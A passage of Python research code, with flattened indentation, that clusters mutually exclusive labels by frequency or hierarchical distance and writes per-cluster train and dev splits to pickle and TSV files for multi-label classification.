self.out_dir = os.path.join(self.data_dir,
'MCC/{}_{}_{}_{}_Hierarchical_Clustering'.format(self.min_cluster_size,
self.max_cluster_size,
self.max_freq_threshold,
self.add_none))
try:
self.H = pickle.load(
open(os.path.join(self.data_dir, 'MCC/H_matrix_{}l_{}d_{}.p'.format(self.m, self.n, self.add_none)),
'rb'))
self.mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
self.class2idx = {cls: i for i, cls in enumerate(self.mlb.classes_)}
except:
self.compute_hierarchical_distances()
self.class2idx = {cls: i for i, cls in enumerate(self.mlb.classes_)}
def compute_hierarchical_distances(self):
self.H = np.zeros((self.m, self.m))
self.mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
all_classes = self.mlb.classes_
dc = DistanceComputer(self.hierarchical_data_dir)
print("Computing pairwise hierarchical distances between the labels...")
for i, class1 in enumerate(tqdm(all_classes)):
remaining_classes = all_classes[i + 1:]
for j, class2 in enumerate(remaining_classes):
class1_idx, class2_idx = i, j + i + 1
distance = dc.compute_distance(class1, class2)
self.H[class1_idx, class2_idx] = distance
self.H[class2_idx, class1_idx] = distance
pickle.dump(self.H, open(os.path.join(self.data_dir, 'MCC/H_matrix_{}l_{}d_{}.p'.format(self.m, self.n,
self.add_none)), 'wb'))
def generate_clusters_by_hierarchical_distance(self):
"""
Generates clusters such that the labels are as hierarchically close as possible within the clusters,
while maintaining mututal exclusivity within each cluster
:return:
"""
unordered_freqs = self.compute_label_freqs() # dict of label: count
freqs = sorted(unordered_freqs.items(), key=operator.itemgetter(1), reverse=True) # list of tuples
# [(code, freq), ...] in descending order of frequency
max_count = max([d[1] for d in freqs]) if not self.max_freq_threshold else \
round(self.n * self.max_freq_threshold) # maximum absolute frequency we'll allow in order for a code
# to make it in to a cluster
self.loners = {d[0] for d in freqs if
d[1] > max_count} # set of codes which are too high-freq for a cluster
freqs = [f for f in freqs if f[0] not in self.loners] # remove the loners from our frequency list
remaining_labels = {s[0] for s in freqs} # set of labels we can still cluster
non_overlap_dict = {l: np.where(self.C[l, :] == 0)[0].tolist() for l in
remaining_labels} # a dictionary for each
# label, {label: [list of labels which the key label never co-occurs with], ...}
print("Generating hierarchical clusters...")
for entry in tqdm(freqs): # iterate over every label we didn't discard due to high-freq
seed = entry[
0] # since we're starting with the most high-freq labels, whichever label we're on is the seed
labels = non_overlap_dict[seed] # labels which do not overlap with our chosen seed
if seed not in remaining_labels: # if we already assigned this label to a cluster, it can't be a seed
continue
else:
sorted_closeby_labels = np.argsort(self.H[seed, :])
labels = [l for l in sorted_closeby_labels if l in labels and l in remaining_labels] # gives us
# elegible labels in ascending distance from our seed
# print(self.mlb.classes_[seed])
# print([self.mlb.classes_[l] for l in labels[:15]])
cluster = []
for lab in labels: # iterate over eligible labels...
non_overlaps = set(
non_overlap_dict[lab]) # get the set of labels which current potential/eligible
# label doesn't co-occur with...
if set(cluster).issubset(non_overlaps): # make sure that none of the labels currently in the
# cluster co-occur with this label
cluster.append(lab)
if len(
cluster) == self.max_cluster_size - 1: # if we reached the maximum cluster size, we're done
break
self.clusters[seed] = cluster + [seed] # add to dict which keeps track of clusters by their seeds
remaining_labels -= set(
self.clusters[seed]) # remove these clustered labels from our set of remaining
for l in self.loners: # make sure to add the loners which we discarded due to high freq; they simply form
# their own cluster
self.clusters[l] = [l]
try:
temp = self.clusters.deepcopy()
to_remove = set()
# now, we want to find those left over, low-frequency codes which ended up alone in their own cluster; the idea
# is to find a cluster we could add them to, which may cause the max_cluster_size to be exceeded by 1 or 2,
# but I feel it's better than leaving them on their own, if we want to employ an LDAM loss function
# sometimes, this doesn't work though and then certain labels are left without a cluster, thus the
# try/except
for seed, cluster in self.clusters.items():
if len(cluster) < self.min_cluster_size and seed not in self.loners:
for label in cluster:
non_overlaps = set(non_overlap_dict[label])
for seed2, cluster2 in self.clusters.items():
# if label == seed2 or seed2 in self.loners:
if seed == seed2 or seed2 in self.loners:
continue
else:
if set(cluster2).issubset(non_overlaps):
temp[seed2].append(label)
to_remove.add(seed)
break
for r in to_remove:
del temp[r]
assert len(self.mlb.classes_) == len([l for label_list in self.clusters.values() for l in label_list]), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
self.clusters = temp
except:
pass
assert len(self.mlb.classes_) == len([l for label_list in self.clusters.values() for l in label_list]), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
def split_data_by_clusters(self, data_type):
"""
Splits data such that each cluster (a separate MCC task) has its own dataset
:return:
"""
self.data_type = data_type
self.load_data(data_type)
if data_type == 'train':
self.generate_clusters_by_hierarchical_distance()
data_type = self.train_data
elif data_type == 'dev':
data_type = self.dev_data
mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
data_dict = defaultdict(list)
self.make_cluster_idx2general_idx_dict()
for item in data_type:
doc_id = item[0]
text = item[1]
label_matrix = item[2]
labels = np.nonzero(label_matrix)[0].tolist()
activated_clusters = [seed for seed, cluster in self.clusters.items() if bool(set(labels) & set(cluster))]
if self.data_type == 'train':
assert len(labels) == len(
activated_clusters), "Sorry, mismatch with labels {} and activated clusters {}, " \
"document {}".format('|'.join([str(l) for l in labels]),
'|'.join([str(a) for a in
activated_clusters]),
doc_id)
for seed in activated_clusters:
label_matrix = np.zeros(len(self.clusters[seed])) # generate an empty matrix of cluster size to add
# binary labels to for MLCC using BR
filtered_labels = set(labels) & set(self.clusters[seed]) # determine which labels of this example are
# relevant to the currently activated cluster
new_cluster_specific_label_idx = [self.overall_idx2cluster_idx[seed][l] for l in filtered_labels]
label_matrix[new_cluster_specific_label_idx] = 1
# if self.data_type == 'train':
# print(label_matrix)
data_dict[seed].append((doc_id, text, label_matrix))
for seed, data in data_dict.items():
if not os.path.exists(os.path.join(self.out_dir, str(seed))):
os.mkdir(os.path.join(self.out_dir, str(seed)))
with open(os.path.join(self.out_dir, str(seed), self.data_type + '.tsv'), 'w') as f:
file_name = os.path.join(str(seed), '{}_doc_id2gold.p'.format(self.data_type))
temp = dict()
if self.data_type == 'train':
all_labs = np.array([e[-1] for e in data])
self.label_class_counts[seed] = np.sum(all_labs, axis=0).tolist()
for entry in data:
# if self.data_type == 'train':
# lab_idx = np.nonzero(entry[-1])[0].item()
# self.label_class_counts[seed][lab_idx] += 1 # for class counts
self.doc_id2activated_clusters[entry[0]].add(seed)
temp[entry[0]] = entry[2]
lab = self.cluster_idx2overall_idx[seed][np.nonzero(entry[2])[0][0]]
lab = mlb.classes_[lab]
f.write(str(entry[0]) + '\t' + entry[1] + '\t' + lab + '\n')
pickle.dump(temp, open(os.path.join(self.out_dir, file_name), 'wb'))
pickle.dump(self.overall_idx2cluster_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'overall_idx2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2overall_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'cluster_idx2overall_idx.p'), 'wb'))
def split_into_cluster_prediction_data(self):
"""
Creates data splits for the MLCC task
:return:
"""
self.seed2cluster_idx = {c: i for i, c in enumerate(self.clusters.keys())}
self.cluster_idx2seed = {i: c for i, c in enumerate(self.clusters.keys())}
temp = []
with open(os.path.join(self.out_dir, 'doc_ids2clusters.p'), 'wb') as pickle_f, \
open(os.path.join(self.out_dir, 'doc_ids2clusters.tsv'), 'w') as f:
for doc_id in self.train_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(doc_id + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
for doc_id in self.dev_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(str(doc_id) + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
pickle.dump(self.doc_id2activated_clusters, pickle_f)
pickle.dump(self.seed2cluster_idx, open(os.path.join(self.out_dir, 'seed2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2seed, open(os.path.join(self.out_dir, 'cluster_idx2seed.p'), 'wb'))
print("Average number of activated clusters per input doc:", np.mean(temp))
print("Total number of clusters:", len(self.clusters))
def main(self):
if not os.path.exists(self.out_dir):
os.mkdir(self.out_dir)
self.split_data_by_clusters('train')
self.split_data_by_clusters('dev')
self.split_into_cluster_prediction_data()
self.generate_preliminary_exp_data()
self.compute_class_counts()
pickle.dump(self.clusters, open(os.path.join(self.out_dir, 'clusters.p'), 'wb'))
else:
self.clusters = pickle.load(open(os.path.join(self.out_dir, 'clusters.p'), 'rb'))
class MC2CFuzzyLabelClusterer():
def __init__(self, data_dir, max_cluster_size=10, min_cluster_size=5, max_freq_threshold=0.0, add_none=False):
self.data_dir = data_dir
self.data_type = ''
self.load_data('train')
self.load_data('dev')
self.add_none = add_none
self.train_ids = [d[0] for d in self.train_data]
self.dev_ids = [d[0] for d in self.dev_data]
self.max_freq_threshold = max_freq_threshold
self.m = len(self.train_data[0][2]) # num labels
self.n = len(self.train_data) # num docs
self.E = np.zeros((self.n, self.m))
self.C = np.zeros((self.m, self.m))
self.create_E_matrix()
self.power_dict = dict() # per-label clustering power dictionary
self.clusters = defaultdict(set) # dict of {seed: {label1, ..., labeln},...}
self.loners = set() # those labels which get their own single binary classifier
self.doc_id2activated_clusters = defaultdict(set) # dictionary mapping doc_id --> relevant clusters
self.max_cluster_size = max_cluster_size
self.min_cluster_size = min_cluster_size
self.n_c = (self.m // (self.max_cluster_size - 1)) + 1
self.cluster_class_counts = dict()
self.label_class_counts = dict()
self.overall_idx2cluster_idx = defaultdict(dict)
self.cluster_idx2overall_idx = defaultdict(dict)
if not os.path.exists(os.path.join(self.data_dir, 'MCC/')):
os.mkdir(os.path.join(self.data_dir, 'MCC/'))
try:
self.C = pickle.load(
open(os.path.join(self.data_dir, 'MCC/C_matrix_{}l_{}d_{}.p'.format(self.m, self.n, self.add_none)),
'rb'))
except:
self.compute_C_matrix()
self.delta = self.n_c / self.m
self.epsilon = 0.001
def load_data(self, data_type):
self.train_data = pickle.load(open(os.path.join(self.data_dir, 'train_0_False.p'.format(data_type)), 'rb'))
self.dev_data = pickle.load(open(os.path.join(self.data_dir, 'dev_0_False.p'.format(data_type)), 'rb'))
def create_E_matrix(self):
try:
for i, (doc_id, text, labels, ranks) in enumerate(self.train_data):
# labels = np.append(labels, np.array([0]))
self.E[i, :] = labels
except:
for i, (doc_id, text, labels) in enumerate(self.train_data):
# labels = np.append(labels, np.array([0]))
self.E[i, :] = labels
def compute_C_matrix(self):
"""
Creates a co-occurrence matrix from self.E
:return:
"""
for i in trange(self.m):
for j in range(self.n):
co_occurrences = set(np.nonzero(self.E[j, :])[0])
if i not in co_occurrences:
continue
else:
for l in co_occurrences:
self.C[i, l] = 1
pickle.dump(self.C, open(os.path.join(self.data_dir, 'MCC/C_matrix_{}l_{}d_{}.p'.format(self.m, self.n,
self.add_none)), 'wb'))
def generate_clusters_by_freq(self):
"""
Generates clusters such that the frequencies are as close as possible within the clusters, while maintaining
mututal exclusivity within each cluster
:return:
"""
unordered_freqs = self.compute_label_freqs() # dict of label: count
freqs = sorted(unordered_freqs.items(), key=operator.itemgetter(1), reverse=True) # list of tuples
# [(code, freq), ...] in descending order of frequency
max_count = max([d[1] for d in freqs]) if not self.max_freq_threshold else \
round(self.n * self.max_freq_threshold) # maximum absolute frequency we'll allow in order for a code
# to make it in to a cluster
self.loners = {d[0] for d in freqs if d[1] > max_count} # set of codes which are too high-freq for a cluster
freqs = [f for f in freqs if f[0] not in self.loners] # remove the loners from our frequency list
remaining_labels = {s[0] for s in freqs} # set of labels we can still cluster
non_overlap_dict = {l: np.where(self.C[l, :] == 0)[0].tolist() for l in
remaining_labels} # a dictionary for each
# label, {label: [list of labels which the key label never co-occurs with], ...}
for entry in freqs: # iterate over every label we didn't discard due to high-freq
seed = entry[0] # since we're starting with the most high-freq labels, whichever label we're on is the seed
labels = non_overlap_dict[seed] # labels which do not overlap with our chosen seed
if seed not in remaining_labels: # if we already assigned this label to a cluster, it can't be a seed
continue
else:
labels = [l[0] for l in freqs if l[0] in labels and l[0] in remaining_labels] # gives us the eligible
# labels in descending freq
cluster = []
for lab in labels: # iterate over eligible labels...
non_overlaps = set(non_overlap_dict[lab]) # get the set of labels which current potential/eligible
# label doesn't co-occur with...
if set(cluster).issubset(non_overlaps): # make sure that none of the labels currently in the
# cluster co-occur with this label
cluster.append(lab)
if len(cluster) == self.max_cluster_size - 1: # if we reached the maximum cluster size, we're done
break
self.clusters[seed] = cluster + [seed] # add to dict which keeps track of clusters by their seeds
remaining_labels -= set(self.clusters[seed]) # remove these clustered labels from our set of remaining
for l in self.loners: # make sure to add the loners which we discarded due to high freq; they simply form
# their own cluster
self.clusters[l] = [l]
to_remove = set()
# now, we want to find those left over, low-frequency codes which ended up alone in their own cluster; the idea
# is to find a cluster we could add them to, which may cause the max_cluster_size to be exceeded by 1 or 2,
# but I feel it's better than leaving them on their own, if we want to employ an LDAM loss function
for seed, cluster in self.clusters.items():
if len(cluster) < self.min_cluster_size and seed not in self.loners:
for label in cluster:
non_overlaps = set(non_overlap_dict[label])
for seed2, cluster2 in self.clusters.items():
if label == seed2 or seed2 in self.loners:
continue
else:
if set(cluster2).issubset(non_overlaps):
self.clusters[seed2].append(label)
to_remove.add(seed)
break
for r in to_remove:
del self.clusters[r]
def compute_label_freqs(self):
label_freq_dict = {i: np.sum(self.E[:, i]) for i in range(self.m)}
return label_freq_dict
def make_cluster_idx2general_idx_dict(self):
"""
Creates a dictionary which maps between the global index of a label and the local (inner-cluster-specific)
index. The seed is what identifies a cluster, and this gives us a way to map between what labels are at
what indices within a cluster
:return:
"""
for seed, cluster in self.clusters.items():
for i, c in enumerate(cluster):
self.overall_idx2cluster_idx[seed][c] = i # {Seed: {mlb label idx: inner-cluster idx,...},...}
self.cluster_idx2overall_idx[seed][i] = c # {Seed: {inner-cluster idx: mlb label idx,...},...}
def split_data_by_clusters(self, data_type):
"""
Splits data such that each cluster (a separate MCC task) has its own dataset
:return:
"""
self.data_type = data_type
self.load_data(data_type)
if data_type == 'train':
self.generate_clusters_by_freq()
data_type = self.train_data
elif data_type == 'dev':
data_type = self.dev_data
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
if not os.path.exists(out_dir):
os.mkdir(out_dir)
mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
data_dict = defaultdict(list)
self.make_cluster_idx2general_idx_dict()
for item in data_type:
doc_id = item[0]
text = item[1]
label_matrix = item[2]
labels = np.nonzero(label_matrix)[0].tolist()
activated_clusters = [seed for seed, cluster in self.clusters.items() if bool(set(labels) & set(cluster))]
if self.data_type == 'train':
assert len(labels) == len(
activated_clusters), "Sorry, mismatch with labels {} and activated clusters {}, " \
"document {}".format('|'.join([str(l) for l in labels]),
'|'.join([str(a) for a in
activated_clusters]),
doc_id)
for seed in activated_clusters:
label_matrix = np.zeros(len(self.clusters[seed])) # generate an empty matrix of cluster size to add
# binary labels to for MLCC using BR
filtered_labels = set(labels) & set(self.clusters[seed]) # determine which labels of this example are
# relevant to the currently activated cluster
new_cluster_specific_label_idx = [self.overall_idx2cluster_idx[seed][l] for l in filtered_labels]
label_matrix[new_cluster_specific_label_idx] = 1
# if self.data_type == 'train':
# print(label_matrix)
data_dict[seed].append((doc_id, text, label_matrix))
for seed, data in data_dict.items():
if not os.path.exists(os.path.join(out_dir, str(seed))):
os.mkdir(os.path.join(out_dir, str(seed)))
with open(os.path.join(out_dir, str(seed), self.data_type + '.tsv'), 'w') as f:
file_name = os.path.join(str(seed), '{}_doc_id2gold.p'.format(self.data_type))
temp = dict()
if self.data_type == 'train':
all_labs = np.array([e[-1] for e in data])
self.label_class_counts[seed] = np.sum(all_labs, axis=0).tolist()
for entry in data:
# if self.data_type == 'train':
# lab_idx = np.nonzero(entry[-1])[0].item()
# self.label_class_counts[seed][lab_idx] += 1 # for class counts
self.doc_id2activated_clusters[entry[0]].add(seed)
temp[entry[0]] = entry[2]
lab = self.cluster_idx2overall_idx[seed][np.nonzero(entry[2])[0][0]]
lab = mlb.classes_[lab]
f.write(str(entry[0]) + '\t' + entry[1] + '\t' + lab + '\n')
pickle.dump(temp, open(os.path.join(out_dir, file_name), 'wb'))
pickle.dump(self.overall_idx2cluster_idx[seed],
open(os.path.join(out_dir, str(seed), 'overall_idx2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2overall_idx[seed],
open(os.path.join(out_dir, str(seed), 'cluster_idx2overall_idx.p'), 'wb'))
def split_into_cluster_prediction_data(self):
self.seed2cluster_idx = {c: i for i, c in enumerate(self.clusters.keys())}
self.cluster_idx2seed = {i: c for i, c in enumerate(self.clusters.keys())}
temp = []
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
with open(os.path.join(out_dir, 'doc_ids2clusters.p'), 'wb') as pickle_f, \
open(os.path.join(out_dir, 'doc_ids2clusters.tsv'), 'w') as f:
for doc_id in self.train_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(doc_id + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
for doc_id in self.dev_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(str(doc_id) + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
pickle.dump(self.doc_id2activated_clusters, pickle_f)
pickle.dump(self.seed2cluster_idx, open(os.path.join(out_dir, 'seed2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2seed, open(os.path.join(out_dir, 'cluster_idx2seed.p'), 'wb'))
print("Average number of activated clusters per input doc:", np.mean(temp))
print("Total number of clusters:", len(self.clusters))
def generate_preliminary_exp_data(self):
PRELIMINARY_EXP_DATA = []
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
with open(os.path.join(out_dir, 'train.p'), 'wb') as pf:
for d in self.train_data:
PRELIMINARY_EXP_DATA.append((d[0], d[1], self.doc_id2activated_clusters[d[0]]))
pickle.dump(PRELIMINARY_EXP_DATA, pf)
def compute_class_counts(self):
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
# label_class_counts = dict()
# for seed, idx2count_dict in self.label_class_counts.items():
# label_class_counts[seed] = [idx2count_dict[k] for k in sorted(idx2count_dict)]
# print(label_class_counts)
cluster_class_counts = {seed: sum(counts) for seed, counts in self.label_class_counts.items()}
cluster_class_counts = [cluster_class_counts[self.cluster_idx2seed[i]] for i in
range(len(cluster_class_counts))]
cluster_class_counts = [(self.n - c) / c for c in cluster_class_counts]
label_class_counts = {self.seed2cluster_idx[k]: v for k, v in self.label_class_counts.items()}
# the inner-cluster class counts are now in a dictionary where they are looked up by their index in the
# MLCC step, rather then by their seed
pickle.dump(label_class_counts, open(os.path.join(out_dir, 'local_class_counts.p'), 'wb'))
pickle.dump(cluster_class_counts, open(os.path.join(out_dir, 'global_cluster_counts.p'), 'wb'))
def generate_activated_clusters_for_dev_data(self):
print(self.clusters)
pass
def main(self):
self.split_data_by_clusters('train')
self.split_data_by_clusters('dev')
self.split_into_cluster_prediction_data()
self.generate_preliminary_exp_data()
self.compute_class_counts()
class MC2CFuzzyHierarchicalLabelClusterer():
def __init__(self, data_dir, max_cluster_size=10, min_cluster_size=5, max_freq_threshold=0.0, add_none=False):
self.data_dir = data_dir
self.data_type = ''
self.load_data('train')
self.load_data('dev')
self.add_none = add_none
self.train_ids = [d[0] for d in self.train_data]
self.dev_ids = [d[0] for d in self.dev_data]
self.max_freq_threshold = max_freq_threshold
self.m = len(self.train_data[0][2]) # num labels
self.n = len(self.train_data) # num docs
self.E = np.zeros((self.n, self.m))
self.C = np.zeros((self.m, self.m))
self.create_E_matrix()
self.power_dict = dict() # per-label clustering power dictionary
self.clusters = defaultdict(set) # dict of {seed: {label1, ..., labeln},...}
self.loners = set() # those labels which get their own single binary classifier
self.doc_id2activated_clusters = defaultdict(set) # dictionary mapping doc_id --> relevant clusters
self.max_cluster_size = max_cluster_size
self.min_cluster_size = min_cluster_size
self.n_c = (self.m // (self.max_cluster_size - 1)) + 1
self.cluster_class_counts = dict()
self.label_class_counts = dict()
self.overall_idx2cluster_idx = defaultdict(dict)
self.cluster_idx2overall_idx = defaultdict(dict)
if not os.path.exists(os.path.join(self.data_dir, 'MCC/')):
os.mkdir(os.path.join(self.data_dir, 'MCC/'))
try:
self.C = pickle.load(
open(os.path.join(self.data_dir, 'MCC/C_matrix_{}l_{}d_{}.p'.format(self.m, self.n, self.add_none)),
'rb'))
except:
self.compute_C_matrix()
self.delta = self.n_c / self.m
self.epsilon = 0.001
def load_data(self, data_type):
self.train_data = pickle.load(open(os.path.join(self.data_dir, 'train_0_False.p'.format(data_type)), 'rb'))
self.dev_data = pickle.load(open(os.path.join(self.data_dir, 'dev_0_False.p'.format(data_type)), 'rb'))
def create_E_matrix(self):
try:
for i, (doc_id, text, labels, ranks) in enumerate(self.train_data):
# labels = np.append(labels, np.array([0]))
self.E[i, :] = labels
except:
for i, (doc_id, text, labels) in enumerate(self.train_data):
# labels = np.append(labels, np.array([0]))
self.E[i, :] = labels
def compute_C_matrix(self):
"""
Creates a co-occurrence matrix from self.E
:return:
"""
for i in trange(self.m):
for j in range(self.n):
co_occurrences = set(np.nonzero(self.E[j, :])[0])
if i not in co_occurrences:
continue
else:
for l in co_occurrences:
self.C[i, l] = 1
pickle.dump(self.C, open(os.path.join(self.data_dir, 'MCC/C_matrix_{}l_{}d_{}.p'.format(self.m, self.n,
self.add_none)), 'wb'))
def generate_clusters_by_freq(self):
"""
Generates clusters such that the frequencies are as close as possible within the clusters, while maintaining
mututal exclusivity within each cluster
:return:
"""
unordered_freqs = self.compute_label_freqs() # dict of label: count
freqs = sorted(unordered_freqs.items(), key=operator.itemgetter(1), reverse=True) # list of tuples
# [(code, freq), ...] in descending order of frequency
max_count = max([d[1] for d in freqs]) if not self.max_freq_threshold else \
round(self.n * self.max_freq_threshold) # maximum absolute frequency we'll allow in order for a code
# to make it in to a cluster
self.loners = {d[0] for d in freqs if d[1] > max_count} # set of codes which are too high-freq for a cluster
freqs = [f for f in freqs if f[0] not in self.loners] # remove the loners from our frequency list
remaining_labels = {s[0] for s in freqs} # set of labels we can still cluster
non_overlap_dict = {l: np.where(self.C[l, :] == 0)[0].tolist() for l in
remaining_labels} # a dictionary for each
# label, {label: [list of labels which the key label never co-occurs with], ...}
for entry in freqs: # iterate over every label we didn't discard due to high-freq
seed = entry[0] # since we're starting with the most high-freq labels, whichever label we're on is the seed
labels = non_overlap_dict[seed] # labels which do not overlap with our chosen seed
if seed not in remaining_labels: # if we already assigned this label to a cluster, it can't be a seed
continue
else:
labels = [l[0] for l in freqs if l[0] in labels and l[0] in remaining_labels] # gives us the eligible
# labels in descending freq
cluster = []
for lab in labels: # iterate over eligible labels...
non_overlaps = set(non_overlap_dict[lab]) # get the set of labels which current potential/eligible
# label doesn't co-occur with...
if set(cluster).issubset(non_overlaps): # make sure that none of the labels currently in the
# cluster co-occur with this label
cluster.append(lab)
if len(cluster) == self.max_cluster_size - 1: # if we reached the maximum cluster size, we're done
break
self.clusters[seed] = cluster + [seed] # add to dict which keeps track of clusters by their seeds
remaining_labels -= set(self.clusters[seed]) # remove these clustered labels from our set of remaining
for l in self.loners: # make sure to add the loners which we discarded due to high freq; they simply form
# their own cluster
self.clusters[l] = [l]
to_remove = set()
# now, we want to find those left over, low-frequency codes which ended up alone in their own cluster; the idea
# is to find a cluster we could add them to, which may cause the max_cluster_size to be exceeded by 1 or 2,
# but I feel it's better than leaving them on their own, if we want to employ an LDAM loss function
for seed, cluster in self.clusters.items():
if len(cluster) < self.min_cluster_size and seed not in self.loners:
for label in cluster:
non_overlaps = set(non_overlap_dict[label])
for seed2, cluster2 in self.clusters.items():
if label == seed2 or seed2 in self.loners:
continue
else:
if set(cluster2).issubset(non_overlaps):
self.clusters[seed2].append(label)
to_remove.add(seed)
break
for r in to_remove:
del self.clusters[r]
def compute_label_freqs(self):
label_freq_dict = {i: np.sum(self.E[:, i]) for i in range(self.m)}
return label_freq_dict
def make_cluster_idx2general_idx_dict(self):
"""
Creates a dictionary which maps between the global index of a label and the local (inner-cluster-specific)
index. The seed is what identifies a cluster, and this gives us a way to map between what labels are at
what indices within a cluster
:return:
"""
for seed, cluster in self.clusters.items():
for i, c in enumerate(cluster):
self.overall_idx2cluster_idx[seed][c] = i # {Seed: {mlb label idx: inner-cluster idx,...},...}
self.cluster_idx2overall_idx[seed][i] = c # {Seed: {inner-cluster idx: mlb label idx,...},...}
def split_data_by_clusters(self, data_type):
"""
Splits data such that each cluster (a separate MCC task) has its own dataset
:return:
"""
self.data_type = data_type
self.load_data(data_type)
if data_type == 'train':
self.generate_clusters_by_freq()
data_type = self.train_data
elif data_type == 'dev':
data_type = self.dev_data
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
if not os.path.exists(out_dir):
os.mkdir(out_dir)
mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
data_dict = defaultdict(list)
self.make_cluster_idx2general_idx_dict()
for item in data_type:
doc_id = item[0]
text = item[1]
label_matrix = item[2]
labels = np.nonzero(label_matrix)[0].tolist()
activated_clusters = [seed for seed, cluster in self.clusters.items() if bool(set(labels) & set(cluster))]
if self.data_type == 'train':
assert len(labels) == len(
activated_clusters), "Sorry, mismatch with labels {} and activated clusters {}, " \
"document {}".format('|'.join([str(l) for l in labels]),
'|'.join([str(a) for a in
activated_clusters]),
doc_id)
for seed in activated_clusters:
label_matrix = np.zeros(len(self.clusters[seed])) # generate an empty matrix of cluster size to add
# binary labels to for MLCC using BR
filtered_labels = set(labels) & set(self.clusters[seed]) # determine which labels of this example are
# relevant to the currently activated cluster
new_cluster_specific_label_idx = [self.overall_idx2cluster_idx[seed][l] for l in filtered_labels]
label_matrix[new_cluster_specific_label_idx] = 1
# if self.data_type == 'train':
# print(label_matrix)
data_dict[seed].append((doc_id, text, label_matrix))
for seed, data in data_dict.items():
if not os.path.exists(os.path.join(out_dir, str(seed))):
os.mkdir(os.path.join(out_dir, str(seed)))
with open(os.path.join(out_dir, str(seed), self.data_type + '.tsv'), 'w') as f:
file_name = os.path.join(str(seed), '{}_doc_id2gold.p'.format(self.data_type))
temp = dict()
if self.data_type == 'train':
all_labs = np.array([e[-1] for e in data])
self.label_class_counts[seed] = np.sum(all_labs, axis=0).tolist()
for entry in data:
# if self.data_type == 'train':
# lab_idx = np.nonzero(entry[-1])[0].item()
# self.label_class_counts[seed][lab_idx] += 1 # for class counts
self.doc_id2activated_clusters[entry[0]].add(seed)
temp[entry[0]] = entry[2]
lab = self.cluster_idx2overall_idx[seed][np.nonzero(entry[2])[0][0]]
lab = mlb.classes_[lab]
f.write(str(entry[0]) + '\t' + entry[1] + '\t' + lab + '\n')
pickle.dump(temp, open(os.path.join(out_dir, file_name), 'wb'))
pickle.dump(self.overall_idx2cluster_idx[seed],
open(os.path.join(out_dir, str(seed), 'overall_idx2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2overall_idx[seed],
open(os.path.join(out_dir, str(seed), 'cluster_idx2overall_idx.p'), 'wb'))
def split_into_cluster_prediction_data(self):
self.seed2cluster_idx = {c: i for i, c in enumerate(self.clusters.keys())}
self.cluster_idx2seed = {i: c for i, c in enumerate(self.clusters.keys())}
temp = []
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
with open(os.path.join(out_dir, 'doc_ids2clusters.p'), 'wb') as pickle_f, \
open(os.path.join(out_dir, 'doc_ids2clusters.tsv'), 'w') as f:
for doc_id in self.train_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(doc_id + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
for doc_id in self.dev_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
